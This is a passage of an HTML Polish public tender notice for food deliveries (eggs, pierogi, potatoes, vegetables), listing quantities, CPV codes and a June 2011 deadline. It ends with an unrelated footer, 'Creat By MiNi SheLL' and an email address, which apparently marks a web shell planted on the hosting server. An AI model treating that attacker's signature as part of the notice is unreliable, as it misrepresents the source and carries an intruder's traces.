Kapusta pekińska	kg.	200
Kapusta kiszona	kg.	120
Ogórek kwaszony 	kg.	100
Fasola biała Jaś	kg.	60
Czosnek 	kg.	5
Pieczarka	kg.	40
kalafior	kg.	40
Brokuły	Kg 	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> JAJA KURZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze świeże kl. I 	szt	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PRODUKTY MĄCZNE GOTOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi ruskie  domowe	Kg.	350
Pierogi z kapustą i grzybami	kg.	100
Pierogi z mięsem	kg	100
Uszka z grzybami	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZIEMNIAKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ziemniaki kg	 4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com